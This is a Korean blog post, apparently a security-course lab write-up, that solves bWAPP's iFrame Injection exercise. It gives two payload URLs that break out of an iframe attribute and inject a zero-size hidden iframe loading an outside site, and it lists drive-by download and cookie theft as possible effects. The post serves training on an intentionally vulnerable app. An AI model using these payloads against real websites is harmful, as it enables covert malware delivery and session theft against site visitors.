Notice
Recent Posts
Recent Comments
Link
반응형
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | 6 | |
| 7 | 8 | 9 | 10 | 11 | 12 | 13 |
| 14 | 15 | 16 | 17 | 18 | 19 | 20 |
| 21 | 22 | 23 | 24 | 25 | 26 | 27 |
| 28 | 29 | 30 |
Tags
- 악성코드 분석
- 우아한테크코스
- 루키즈31기
- 깃
- Practical Malware Analysis Labs
- 우테코
- 위상 정렬
- sk 쉴더스 루키즈
- SK쉴더스
- c
- webhacking
- 자바
- 트랜스포트 계층
- Dreamhack
- React
- SK쉴더스루키즈
- 루키즈 31기
- sk쉴더스 루키즈
- 백엔드
- linux
- 서울청년문화패스
- 레나튜토리얼
- 프랑스어 #프랑스어배우기 #프랑스어독학 #델프인강 #시원스쿨프랑스어 #delf독학 #델프 #프랑스어기초 #프랑스어공부
- 애플리케이션 계층
- 진입차수
- 알고리즘
- 예술의 전당
- 웹개발
- 프리코스
- 코리안챔버오케스트라
Archives
- Today
- Total
yon11b
[SK 쉴더스 루키즈] bWAPP iFrame Injection 문제 본문
반응형
ctrl+U를 눌러서 페이지 소스를 보면 iframe 태그로 robots.txt를 보여주고 있는 것을 확인할 수 있다.
그럼 이제 ParamUrl= 부분에 내가 원하는 공격사이트 주소를 같이 넣어주면 된다.
근데 이제 원래 보여줬던 robots.txt도 같이 보여줘서 정상인 것처럼 보이게 한다.
즉, iframe을 두 개 보여주는 것이다. 하나는 정상, 하나는 malware 사이트.
http://192.168.10.128/iframei.php?ParamUrl=https://www.malware-traffic-analysis.net/" height="0" width="0"></iframe><iframe frameborder="0" src="robots.txt&ParamWidth=250&ParamHeight=250
- 백그라운드에서 malware-traffic-analysis.net 자동 로드
- 만약 그 사이트가 진짜 악성 사이트라면:
- 드라이브 바이 다운로드 (자동 다운로드)
- 브라우저 익스플로잇 실행
- 멀웨어 감염
- 쿠키/세션 탈취 등
을 수행할 수 있다.
만약 진짜 malware 사이트가 로드되었는지 보고 싶다면 height, width=0을 안 주면 된다.
http://192.168.10.128/bWAPP/iframei.php?ParamUrl=https://www.malware-traffic-analysis.net/"></iframe><iframe frameborder="0" src="robots.txt&ParamWidth=250&ParamHeight=250
728x90
'보안 > SK 쉴더스 루키즈' 카테고리의 다른 글
| [SK 쉴더스 루키즈] CSRF 실습(NodeGoat, bWAPP) (0) | 2026.05.08 |
|---|---|
| [SK 쉴더스 루키즈] Insecure Design(tampering 실습) (0) | 2026.05.07 |
| [SK 쉴더스 루키즈] Sqlmap & blind sql injection (0) | 2026.05.07 |
| [SK 쉴더스 루키즈] Cryptographic Failures 취약점(TLS 통신, robots.txt) (0) | 2026.05.07 |
| [SK 쉴더스 루키즈] SQL Injection 실습 bWAPP (GET/Search, POST/Select 문제, webhacking.kr 27번 write up) (0) | 2026.05.07 |
'보안/SK 쉴더스 루키즈' Related Articles
more
